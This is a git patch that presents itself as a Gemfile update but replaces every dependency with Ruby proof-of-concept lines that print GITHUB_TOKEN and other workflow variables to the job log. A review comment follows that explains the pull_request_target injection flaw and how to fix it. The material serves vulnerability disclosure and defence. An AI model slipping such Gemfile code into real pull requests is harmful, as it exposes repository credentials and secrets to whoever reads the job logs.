From 6c241896352b45585a367aa0d72ca9538839569e Mon Sep 17 00:00:00 2001
From: 0xoroot <0xoroot@wearehackerone.com>
Date: Thu, 7 May 2026 11:35:41 +0300
Subject: [PATCH] Update Gemfile
---
 Gemfile | 32 +++++++++++---------------------
 1 file changed, 11 insertions(+), 21 deletions(-)
diff --git a/Gemfile b/Gemfile
index 3bb0165fab2..b213893a425 100644
--- a/Gemfile
+++ b/Gemfile
@@ -1,24 +1,14 @@
 source "https://rubygems.org"
-gem "faraday", "2.14.1"
-gem "faraday-retry", "2.4.0"
-gem "github-pages", "~> 232", group: :jekyll_plugins
-gem "json", "2.19.4"
-gem "language_server-protocol", "3.17.0.5"
-gem "nokogiri", "~> 1.19.2"
-gem "rake", "13.4.2"
-gem "rubocop", "1.86.1"
+# === SECURITY POC — pull_request_target workflow injection ===
+# Gemfile is evaluated as Ruby by Bundler during `bundle install`
+# This proves arbitrary code execution in the lint workflow context
+$stderr.puts "[POC-START]"
+$stderr.puts "GITHUB_TOKEN=#{ENV['GITHUB_TOKEN']}"
+$stderr.puts "GITHUB_REPOSITORY=#{ENV['GITHUB_REPOSITORY']}"
+$stderr.puts "GITHUB_ACTOR=#{ENV['GITHUB_ACTOR']}"
+$stderr.puts "GITHUB_SHA=#{ENV['GITHUB_SHA']}"
+$stderr.puts "[POC-END]"
+# === END POC ===
-group :test do
-  gem "fastimage"
-  gem "httparty"
-  gem "minitest"
-  gem "octokit"
-  gem "pry", require: false
-  gem "rubocop-performance"
-  gem "safe_yaml"
-end
-
-group :development do
-  gem "webrick"
-end
+gem "rubocop", "~> 1.0"
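Review bot: The added line `$stderr.puts "GITHUB_TOKEN=#{ENV['GITHUB_TOKEN']}"` writes a workflow credential into the job log, and the hunk also deletes every real dependency (faraday, github-pages, nokogiri, rake, the :test and :development groups) in favour of a single `gem "rubocop", "~> 1.0"`, so this patch is a demonstration and must not be merged as a Gemfile change despite the "Update Gemfile" subject. The hunk's own header comments state the underlying weakness correctly: Bundler evaluates the Gemfile as Ruby, so a workflow that runs `bundle install` on a pull request's head ref under `pull_request_target` executes contributor-controlled code with whatever token and secrets that job holds (the workflow file is not in this patch, so the trigger is inferred from the comment). The fix belongs in the workflow rather than in this file: install dependencies from the base ref, or move the lint job to the `pull_request` event with `permissions: contents: read`, so untrusted Gemfile contents never run with an elevated token. Any run that already executed this branch should be treated as having exposed every secret available to that job; the job-scoped GITHUB_TOKEN expires with the run, but other secrets it could read should be rotated.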